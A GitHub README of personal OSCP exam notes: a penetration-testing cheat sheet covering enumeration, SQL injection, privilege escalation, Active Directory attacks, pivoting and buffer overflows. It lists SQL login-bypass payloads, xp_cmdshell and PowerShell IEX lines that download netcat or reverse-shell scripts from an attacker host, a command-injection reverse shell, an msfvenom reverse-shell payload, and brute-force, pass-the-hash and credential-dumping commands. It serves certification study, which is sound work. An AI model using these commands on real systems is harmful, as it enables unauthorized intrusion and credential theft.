└── README.md /README.md: -------------------------------------------------------------------------------- 1 | # oscp-notes 2 | 3 | I Passed the OSCP in January 2021. These are the notes I took along my journey to achieving it. 4 | 5 | ## Table of Contents 6 | - [Enumeration](#Enumeration) 7 | - [Web Exploitation](#Web-Exploitation) 8 | - [Post Exploitation Linux](#Post-Exploitation-Linux) 9 | - [Post Exploitation Windows](#Post-Exploitation-Windows) 10 | - [Active Directory](#Active-Directory) 11 | - [Pivoting & Port Forwarding](#Pivoting--Port-Forwarding) 12 | - [Other](#Other) 13 | - [Buffer Overflow](#Buffer-Overflow) 14 | 15 | Enumeration 16 | =============================================================================================== 17 | `Basics` 18 | 19 | 20 | - Standard Port Scan 21 | `sudo nmap -T4 -p- -A --osscan-guess --version-all -o in.scan -Pn` 22 | 23 | - Udp Port Scan 24 | `sudo nmap --top-ports 100 -sU -o udp.scan -Pn` 25 | 26 | - Extensions 27 | `txt,php,aspx,cgi,asp,html,jsp,pdf,doc,docx,xls,xlsx,rtf,bak,xml,xsl,phpthml,sh,pl,py,config,php7,exe` 28 | 29 | - Wordlists 30 | 31 | /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 32 | /usr/share/seclists/Discovery/Web-Content/common.txt 33 | /usr/share/seclists/Discovery/Web-Content/big.txt 34 | /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt 35 | /usr/share/seclists/Fuzzing/LFI/LFI-Jhaddix.txt 36 | /usr/share/seclists/Fuzzing/LFI/LFI-LFISuite-pathtotest-huge.txt 37 | /usr/share/seclists/Fuzzing/SQLi/Generic-SQLi.txt 38 | 39 | `TCP 21: FTP` 40 | 41 | - Download Everything 42 | `wget -m ftp://anonymous:anonymous@` 43 | 44 | - Ftp Nmap Scan 45 | `nmap --script ftp-anon,ftp-bounce,ftp-brute,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221,tftp-enum,ftp-syst -p21 ` 46 | 47 | - Ssl Ftp Connection 48 | `openssl s_client -connect :21 -starttls ftp`

49 | 50 | `TCP 22: SSH` 51 | 52 | - Bruteforce 53 | `hydra -l root -P /usr/share/wordlists/password/10k -t 4 ssh`

54 | 55 | `TCP 25: SMTP` 56 | 57 | - Nmap Enumeration 58 | `sudo nmap --script "smtp-commands,smtp-open-relay,smtp-vuln*" -p25 ` 59 | 60 | - User Enumeration 61 | `sudo nmap --script smtp-enum-users --script-args smtp-enum-users.methods={VRFY} -p25 ` 62 | 63 | - Version Scan 64 | `auxiliary/scanner/smtp/smtp_enum` 65 | 66 | - Introduction 67 | `HELO || EHLO ` 68 | 69 | - Enumerate Users 70 | `EXPN || VRFY ` 71 | 72 | - Send Mail From 73 | `MAIL FROM:test@test.org` 74 | 75 | - Send Mail To 76 | `RCPT TO:`

77 | 78 | `TCP 53: DNS` 79 | 80 | - Standard Enum 81 | 82 | nslookup 83 | server 84 | 127.0.0.1 85 | 86 | 87 | - Zone Transfer 88 | `dig axfr @ ` 89 | 90 | - Dns Recon 91 | 92 | dnsrecon -r 127.0.0.0/24 -n 93 | dnsrecon -d -r 10.0.0.0/8 94 | 95 |
96 | 97 | `TCP 79: Finger Enumeration` 98 | 99 | - [Pentest Monkey Link](http://pentestmonkey.net/tools/user-enumeration/finger-user-enum) 100 | 101 |
102 | 103 | `tcp 88: Kerberos` 104 | 105 | - Use [Kerbrute](https://github.com/ropnop/kerbrute) to Enumerate Users and Passwords 106 | 107 | - [Rubeus](https://github.com/GhostPack/Rubeus) 108 | 109 |
110 | 111 | `TCP 110: POP3` 112 | 113 | - Nmap Enum Script 114 | `sudo nmap --script pop3-capabilities,pop3-ntlm-info -p110 ` 115 | 116 | - Bruteforce 117 | `sudo nmap --script pop3-brute -p110 ` 118 | `auxiliary/scanner/pop3/pop3_login` 119 | 120 | - Login 121 | 122 | USER 123 | PASS 124 | list - List Emails 125 | retr - Retrieve Email 126 |
127 | 128 | `TCP 111: RPCBIND` 129 | 130 | - Enumeration 131 | `rpcinfo -p ` 132 | `rpcinfo -s ` 133 |
134 | 135 | `TCP 119: NNTP` 136 | 137 | - Possible commands 138 | `HELP, LIST` 139 |

140 | 141 | `TCP 135 MSRPC` 142 | 143 | - Nmap Scan 144 | `sudo nmap -n -sV -Pn -p 135 --script=msrpc-enum ` 145 | 146 | - MSF Enum 147 | 148 | use auxiliary/scanner/dcerpc/endpoint_mapper 149 | use auxiliary/scanner/dcerpc/hidden 150 | use auxiliary/scanner/dcerpc/management 151 | use auxiliary/scanner/dcerpc/tcp_dcerpc_auditor 152 | 153 | - RPC Dump 154 | `/usr/bin/impacket-rpcdump -p 135`

155 | 156 | `TCP 139/445: SMB/RPC` 157 | 158 | - smbmap 159 | `smbmap -H ` 160 | 161 | - [enum4linux-ng](https://github.com/cddmp/enum4linux-ng) 162 | `/opt/enum4linux-ng/enum4linux-ng.py -A ` 163 | 164 | - Version Scan 165 | `use auxiliary/scanner/smb/smb_version` 166 | 167 | - light nmap 168 | `sudo nmap -p445 --script safe 10.10.10.100` 169 | 170 | - Enumerate Share Permissions 171 | `crackmapexec smb --shares` 172 | 173 | - Log Into Shares 174 | `smbclient /// -U ` 175 | 176 | - Dump Info 177 | `python3 /usr/share/doc/python3-impacket/examples/samrdump.py ` 178 | 179 | - Dump Info 180 | `rpcclient -U "" `

181 | 182 | `TCP 143:` 183 | 184 | - Login 185 | `A001 login ` 186 | 187 | - Use Evolution Mail Client to Log In 188 | 189 |
190 | 191 | `TCP 389: LDAP` 192 | 193 | - ldapsearch 194 | `ldapsearch -h -x` 195 | `ldapsearch -h -x -s base namingcontexts` 196 | `ldapsearch -h -x -b ""` 197 | `ldapsearch -h -x -b "" '(objectClass=Person)'` 198 | 199 |
200 | 201 | `TCP 443` 202 | 203 | - Manually Check Certificate 204 | 205 | - Add DNS Names to /etc/hosts 206 | 207 | - SSL Enum 208 | `nmap -sV --script ssl-enum-ciphers ` 209 | 210 | - Nikto 211 | `nikto -h -p 443 -output nikto_443` 212 | 213 | - SSLScan 214 | `sslscan `

215 | 216 | `TCP 1433: MSSQL` 217 | 218 | - Nmap Scan 219 | `nmap -p 1433 --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER ` 220 | 221 | - Log In 222 | `sqsh -S -U ` 223 | 224 | - Another Login 225 | `use auxiliary/scanner/mssql/mssql_login`

226 | 227 | `TCP 1521: ORACLE` 228 | 229 | - [Good Blog Post](https://medium.com/@netscylla/pentesters-guide-to-oracle-hacking-1dcf7068d573) 230 | 231 | - [Oracle Database Attacking Tool](https://github.com/quentinhardy/odat) 232 |
233 | 234 | `TCP 2049: NFS` 235 | 236 | - Show Mountable Files 237 | `showmount -a(d)(e) `

238 | 239 | `TCP 3306: MYSQL` 240 | 241 | - Login 242 | `mysql -u -p` 243 | 244 | - Extensive Nmap 245 | `nmap -sV -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 ` 246 | 247 | - MSF Scripts 248 | 249 | use auxiliary/scanner/mysql/mysql_version 250 | use auxiliary/scanner/mysql/mysql_authbypass_hashdump 251 | auxiliary/scanner/mysql/mysql_hashdump 252 | mysql_enum 253 | mysql_schemadump 254 | mysql_start_up 255 | 256 |
257 | 258 | `TCP 3389: RDP` 259 | 260 | - Log In 261 | `rdesktop -u -p ` 262 |
263 | 264 | `UDP 161: SNMP` 265 | 266 | - Enum 267 | `snmpwalk -c public -v2c ` 268 | `snmp-check ` 269 | 270 |
271 | 272 | `Active Directory` 273 | 274 | - [rpcclient](https://www.willhackforsushi.com/sec504/SMB-Access-from-Linux.pdf) 275 | 276 | rpcclient (-U '') 277 | enumdomusers 278 | enumdomains 279 | srvinfo 280 | setuserinfo2 23 '' 281 | createdomuser username 282 | setuserinfo2 username 24 283 | 284 | 285 | 286 | - SMB 287 | 288 | - Kerbrute 289 | `./kerbrute userenum --dc -d ` 290 | 291 | - Npusers (Dump hashes for users) 292 | 'GetNPUsers.py -dc-ip -no-pass -usersfile /` 293 | 294 | - [Bloodhound.py](https://github.com/fox-it/BloodHound.py) 295 | 296 | edit /etc/resolve.conf 297 | nameserver 298 | search 299 | python3 bloodhound.py -u -p -ns -d domain -c all 300 | Run Bloodhound 301 | 302 | - ldap 303 | 304 |

305 | 306 | Web Exploitation 307 | =============================================================================================== 308 | `SQL Injection` 309 | 310 | - SQLMap 311 | `sqlmap -r ` 312 | 313 | - Test for SQLI 314 | 315 | ' 316 | '-- - 317 | ASCII(97) 318 | ' or 1=1-- 319 | '; waitfor delay ('0:0:20)'-- 320 | wfuzz -u http:///FUZZ -w /usr/share/seclists/Fuzzing/special-chars.txt 321 | 322 | - Login Bypass 323 | 324 | admin' -- 325 | admin' -- - 326 | admin'- 327 | admin' # 328 | admin'/* 329 | admin' or 1=1-- 330 | admin' or 1=1# 331 | admin' or 1=1/* 332 | admin') or '1'='1-- 333 | admin') or ('1'='1-- 334 | 335 | - Abuse Command Shell 336 | 337 | ' EXEC sp_configure 'xp_cmdshell', 1-- 338 | ' reconfigure-- 339 | ' EXEC xp_cmdshell 'certutil -urlcache -f http://:/nc.exe nc.exe'-- 340 | ' EXEC xp_cmdshell "nc.exe -e cmd.exe ";-- 341 | 342 |
343 | `LFI/RFI` 344 | 345 | - Linux Path 346 | `../../../../../../../../etc/passwd` 347 | 348 | - [Windows LFI](https://github.com/seal9055/Docs/blob/main/windows_lfi) 349 | `c:\windows\system32\drivers\etc\hosts` 350 | 351 | - RFI 352 | `http:///p0wny_shell.php` 353 | 354 | - Wordlists 355 | 356 | /usr/share/seclists/Fuzzing/LFI/LFI-Jhaddix.txt 357 | /usr/share/seclists/Fuzzing/LFI/LFI-LFISuite-pathtotest-huge.txt 358 |
359 | 360 | `CGI-BIN` 361 | 362 | - Popular Extensions: .sh & .pl 363 | 364 | - Nmap Check 365 | `nmap -sV -p80 --script http-shellshock --script-args uri=/cgi-bin/,cmd=ls ` 366 | 367 | - MSF Check 368 | `auxiliary/scanner/http/apache_mod_cgi_bash_env` 369 | 370 | - MSF Exploit 371 | `exploit/multi/http/apache_mod_cgi_bash_env_exec` 372 | 373 |
374 | 375 | `XSS` 376 | 377 | - Test 378 | `test: /)>` 379 | 380 | - Reverse Shell 381 | `/$(nc.traditional$IFS-e$IFS/bin/bash$IFS''$IFS'')>` 382 | 383 | - [SSTI - Server Side Template Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection) 384 | 385 | ![SSTI](https://github.com/seal9055/Docs/blob/main/SSTI.png?raw=true) 386 | 387 |
388 | 389 | `CMS` 390 | 391 | - WORDPRESS 392 | `wpscan --url http:// (--api-token ) -e u,ap,at --plugins-detection aggressive` 393 | 394 | - MAGENTO 395 | [Magescan](https://github.com/steverobbins/magescan) 396 |
397 | 398 | `Bruteforce` 399 | 400 | - hydra 401 | `hydra -l admin -P /usr/share/wordlists/password/10k http-post-form '/login.php:username=^USER^&password=^PASS^&Login=Login:Login failed' -V -t 64` 402 | 403 |
404 | 405 | Post Exploitation Linux 406 | =============================================================================================== 407 | 408 |
409 | 410 | `File Upload` 411 | 412 | - Starting Web Server 413 | `python3 -m http.server 80` 414 | 415 | - Filetransfer 416 | 417 | wget / 418 | curl http:/// -o 419 | echo "GET / HTTP/1.0" | nc -n 80 > && sed -i '1,7d' 420 | 421 | - Secure Filetransfers 422 | 423 | on target: ncat -nvlp --ssl > 424 | on kali: ncat -nv --ssl < 425 |
426 | 427 | `Enum Tools` 428 | 429 | [Linenum](https://github.com/rebootuser/LinEnum) 430 | [linux smart enumeration](https://github.com/diego-treitos/linux-smart-enumeration) 431 | [linpeas](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS) 432 | [pspy](https://github.com/DominicBreuker/pspy) 433 | [suid3num](https://github.com/Anon-Exploiter/SUID3NUM) 434 | 435 |
436 | 437 | `Upgrade Shell` 438 | - `python -c 'import pty;pty.spawn("/bin/bash")'` 439 | - `cltr-z ` 440 | - `stty raw -echo;fg fg` 441 | - `export TERM=xterm` 442 | - `stty -a ; stty rows columns 136 rows 32` 443 | - `export PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin` 444 | 445 |
446 | 447 | `Manual` 448 | 449 | - `whoami/id/hostname` 450 | 451 | - `cat /etc/issue` 452 | - `cat /etc/*-release` 453 | 454 | - `history` 455 | 456 | - `w` 457 | 458 | - `ls -l /etc/passwd` 459 | - `ls -l /etc/shadow` 460 | - `ls -l /etc/group` 461 | 462 | sudo -l 463 | (check for env_keep+=LD_PRELOAD) 464 | (check for env_keep+=LD_LIBRARY_PATH) 465 | (sudo Version under 1.9, 1.8.27 exploitable) 466 | 467 | - `find / -group -ls 2>/dev/null` 468 | - `find / -user -ls 2>/dev/null` 469 | 470 | - `cat /etc/exports - (check for nsf)` 471 | 472 | - `mount -l` 473 | - `cat /etc/fstab` 474 | - `/bin/lsblk` 475 | 476 | - `lpstat -a` 477 | - `lscpu` 478 | 479 |
480 | 481 | `Common Files` 482 | 483 | - `grep -Rli password` 484 | - `/` 485 | - `/home` 486 | - `/opt` 487 | - `/tmp` 488 | - `/var` 489 | 490 |
491 | 492 | `Cron` 493 | 494 | - `/etc/cronjobs` 495 | 496 |
497 | 498 | `Service Exploits` 499 | 500 | - `ps aux | grep "^root"` 501 | - `netstat -antup` 502 | 503 | - ` -v` 504 | - ` --version` 505 | 506 | - Debian 507 | `dpkg -l | grep ` 508 | 509 | - Rpm 510 | `rpm -qa | grep ` 511 | 512 |
513 | 514 | `SUID & SGID` 515 | 516 | `find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null` 517 | 518 | - [gtfobins](https://gtfobins.github.io) 519 | 520 | - Check For Writeable Shared Files ([Shell](https://github.com/seal9055/Docs/blob/main/suid.c)) 521 | 522 | strace 2>&1 | grep -iE "open|access|no such file" 523 | create & compile the above linked shell 524 | Execute Service 525 | 526 | - Incomplete Path 527 | 528 | strings 529 | strace -v -f -e execve 2>&1 530 | If found, create a binary with a reverse shell in the /tmp directory and add it to path 531 | PATH=.:$PATH /service 532 | 533 |
534 | 535 | `Kernel Exploits` 536 | 537 | - `uname -a ` 538 | 539 | - `searchsploit linux kernel priv esc` 540 | 541 | - `linux exploit suggester` 542 | 543 |
544 | 545 | `Network` 546 | 547 | - `ip a/ipconfig/ifconfig` 548 | - `route` 549 | - `ss -anp/netstat -anp` 550 | - `dnsdomainname` 551 | - `ls /etc | grep iptables` 552 | - `cat /etc/networks` 553 | - `netstat -punta` 554 | 555 |
556 | 557 | Post Exploitation Windows 558 | =============================================================================================== 559 | 560 |
561 | 562 | `File Upload` 563 | 564 | - Starting Webserver 565 | `python3 -m http.server ` 566 | 567 | - Certutil 568 | `certutil -urlcache -f "http://:/" ` 569 | 570 | - SMB 571 | `on kali: sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py kali .` 572 | `on target: copy \\\reverse.exe C:\tmp\reverse.exe` 573 | 574 | - Powershell 575 | `cmd /c powershell IEX(new-object net.webclient).downloadstring('http:///Invoke-PowerShellTcp.ps1')` 576 | `powershell.exe IEX(new-object net.webclient).downloadstring('http:///Invoke-PowerShellTcp.ps1')` 577 | `powershell -c IEX(new-object net.webclient).downloadstring('http:///Invoke-PowerShellTcp.ps1')` 578 | 579 | - Curl 580 | `curl http:/// -o ` 581 | 582 |
583 | 584 | `Enum Tools` 585 | 586 | - [Powerup](https://github.com/PowerShellEmpire/PowerTools/blob/master/PowerUp/PowerUp.ps1) 587 | `powershell -ep bypass; .\powerup.ps1; Invoke-AllChecks` 588 | 589 | - [Sherlock](https://github.com/rasta-mouse/Sherlock) 590 | `powershell -ep bypass; Import-Module .\sherlock.ps1; Find-AllVulns` 591 | 592 | - [Winpeas](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS) 593 | 594 |
595 | 596 | `Manual` 597 | 598 | whoami /priv | /groups | /all 599 | systeminfo 600 | hostname 601 | net users | net user 602 | set 603 | tasklist /SCV | tasclist /v 604 | 605 |
606 | 607 | `Kernel Exploits` 608 | 609 | - [Windows Exploit Suggester](https://github.com/AonCyberLabs/Windows-Exploit-Suggester) 610 | - [Secwiki](https://github.com/SecWiki/windows-kernel-exploits) 611 | - [Sherlock](https://github.com/rasta-mouse/Sherlock) 612 | 613 |
614 | 615 | `Service Exploits` 616 | 617 | - Insecure Service Properties 618 | 619 | SERVICE_START & SERVICE_STOP & SERVICE_CHANGE_CONFIG 620 | sc qc 621 | sc query 622 | sc config binpath= "\"C:\\"" 623 | listener on kali + START/STOP SERVICE 624 | 625 | - Unquoted Service Path 626 | 627 | SERVICE_START & SERVICE_STOP + unquoted service path 628 | 629 | - Weak Registry Permissions 630 | 631 | reg query 632 | 633 | - Insecure Service Executables 634 | 635 | check winpeas for writeable service executable 636 | replace file with reverse shell 637 | 638 | - DLL Hijacking 639 | 640 | Check all services winpeas recognizes 1 by 1 641 | sc qc 642 | 643 |
644 | 645 | `Scheduled Tasks` 646 | 647 | - `dir C:\windows\tasks` 648 | - `schtasks /query /fo LIST /v` 649 | 650 |
651 | 652 | `Network` 653 | 654 | ipconfig | ifconfig 655 | route print 656 | arp -a 657 | netstat -ano 658 | C:\WINDOWS\System32\drivers\etc\hosts 659 | 660 |
661 | 662 | `Registry` 663 | 664 | - Autorun 665 | `Overwrite program with reverse shell and restart` 666 | 667 | - Always Install Elevated 668 | `Check Winpeas for always install elevated` 669 | 670 |
671 | 672 | `Common Files` 673 | 674 | %SYSTEMROOT%\repair\SAM 675 | %SYSTEMROOT%\System32\config\RegBack\SAM 676 | %SYSTEMROOT%\System32\config\SAM 677 | %SYSTEMROOT%\repair\system 678 | %SYSTEMROOT%\System32\config\SYSTEM 679 | %SYSTEMROOT%\System32\config\RegBack\system 680 | C:\unattend.xml 681 | C:\Windows\System32\ 682 | C:\Windows\System32\sysprep\ 683 | C:\sysprep.inf 684 | C:\sysprep\sysprep.xml 685 |
686 | 687 | `Passwords` 688 | 689 | - Use chisel to remotely forward port 445, and use winexe to log in 690 | `winexe -U % // cmd.exe` 691 | 692 | - Check for passwords 693 | `reg query HKLM /f password /t REG_SZ /s` 694 | `reg query HKCU /f password /t REG_SZ /s` 695 | 696 | - Weak Permissions on Sam Files 697 | `python2 pwdump.py ` 698 | 699 | - Cracking the password 700 | `hashcat -m 1000 --force ` 701 | 702 | - PTH 703 | `pth-winexe -U '' // cmd.exe` 704 | 705 |
706 | 707 | Active Directory 708 | =============================================================================================== 709 | 710 |
711 | 712 | `Manual` 713 | 714 | ipconfig /all 715 | route print 716 | arp -a 717 | netstat -ano 718 | C:\WINDOWS\System32\drivers\etc\hosts 719 | netsh firewall show state 720 | netsh firewall show config 721 | netsh dump 722 | net user 723 | net user /domain 724 | net group /domain 725 | 726 |
727 | 728 | `Powerview` 729 | 730 | powershell -ep bypass 731 | . .\powerview.ps1 732 | net accounts 733 | Get-NetDomain 734 | Get-NetDomainController 735 | Get-DomainPolicy 736 | Get-NetUser 737 | Get-NetUser | select cn 738 | Get-NetUser | select samaccountname 739 | Get-NetComputer 740 | Get-NetGroup 741 | Get-NetGroupMember 742 | Get-DomainUser -SPN 743 | Get-NetLoggedon -ComputerName 744 | Get-NetSession -ComputerName 745 | Invoke-ShareFinder 746 | Get-NETGPO 747 | Invoke-Kerberoast 748 | 749 |
750 | 751 | `Bloodhound` 752 | 753 | powershell -ep bypass 754 | . .\sharphound.ps1 755 | Invoke-BloodHound -CollectionMethod All -Domain -ZipFileName file.zip 756 | Download zip onto kali, import into bloodhound 757 | https://github.com/fox-it/BloodHound.py 758 | 759 |
760 | 761 | `Cracking Ad Hashes` 762 | 763 | ntlm: hashcat -m 1000 hash.txt /usr/share/wordlists/rockyou.txt` 764 | ntlmv2: hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt` 765 |
766 | 767 | `PASS THE PW & HASH` 768 | 769 | crackmapexec /24 -u -d -p 770 | crackmapexec /24 -u -H --local 771 | 772 | `Token Impersonation` 773 | 774 | meterpreter load icognito 775 | list_tokens 776 | impersonate_token 777 | 778 |
779 | 780 | `Kerberoasting` 781 | 782 | Invoke-Kerberoast in powerview 783 | Invoke-Kerberoast -OutputFormat Hashcat | Select-Object Hash | Out-File -filepath 'c:\temp\hashcapture.txt' -width 8000 784 | https://github.com/skelsec/kerberoast 785 | GetUserSPNs.py -request -dc-ip / 786 | 787 |
788 | 789 | `Password Spraying` 790 | 791 | - Create Password List 792 | `crunchy -t %%%% ` 793 | 794 | - Spray 795 | `rowbar -b rdp -s \32 -U users.txt -C pw.txt -n 1` 796 | 797 |
798 | 799 | Pivoting & Port Forwarding 800 | =============================================================================================== 801 | 802 |
803 | 804 | - [Chisel](https://github.com/jpillora/chisel/releases (download windows & linux version)) 805 | 806 | On Host: sudo ./chisel.sh server --reverse --port 807 | On Target: chisel client : R::127.0.0.1: 808 | 809 |
810 | 811 | Other 812 | =============================================================================================== 813 | 814 | `Hashcracking` 815 | 816 | - John 817 | `john --format= --wordlist=/usr/share/wordlists/rockyou.txt hash.txt` 818 | 819 | - Hashcat 820 | 821 | hashcat -m -a 0 -o cracked.txt hash.txt /usr/share/wordlists/rockyou.txt -O 822 | hashcat -m -a 0 -o cracked.txt hash.txt /usr/share/wordlists/rockyou.txt -O -r /usr/share/hashcat/rules/best64.rule 823 | cat pw | hashcat -r/usr/share/hashcat/rules/best64.rule --stdout > wordlist.txt 824 | 825 |
826 | 827 | `SSH Encrypted` 828 | - `/usr/share/john/ssh2john` 829 | 830 |
831 | 832 | `Crack Zip Pw` 833 | - `fcrackzip -uvDp /usr/share/wordlists/rockyou.txt file.zip` 834 | 835 |
836 | 837 | `Tcp Dump` 838 | - `sudo tcpdump -i tun0 icmp` 839 | 840 |
841 | 842 | `Images` 843 | - `binwalk ` 844 | - `binwalk -Me ` 845 | 846 |
847 | 848 | `Recognize Encryption` 849 | - [Tio.run](https://tio.run/#) 850 | 851 |
852 | 853 | `Pip fix (Rarely works)` 854 | 855 | curl https://bootstrap.pypa.io/get-pip.py -o get-pip.py 856 | python get-pip.py 857 | python -m pip install requests 858 | 859 |
860 | 861 | `MYSQL` 862 | 863 | show databases; 864 | use 865 | show tables; 866 | select * from ; 867 | 868 |
869 | 870 | Buffer Overflow 871 | =============================================================================================== 872 | 873 |
874 | 875 | - [Tib3rius](https://tryhackme.com/room/bufferoverflowprep) 876 | 877 | !mona config -set workingfolder c:\mona\%p 878 | /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 879 | !mona findmsp -distance + retn = BBBB 880 | !mona bytearray -b "\x00" 881 | python bad_chars.py 882 | !mona compare -f C:\mona\oscp\bytearray.bin -a 883 | !mona jmp -r esp -cpb "\x00" 884 | msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=4444 EXITFUNC=thread -b "\x00" -f py 885 | padding = "\x90" * 16 886 | 887 |
888 | --------------------------------------------------------------------------------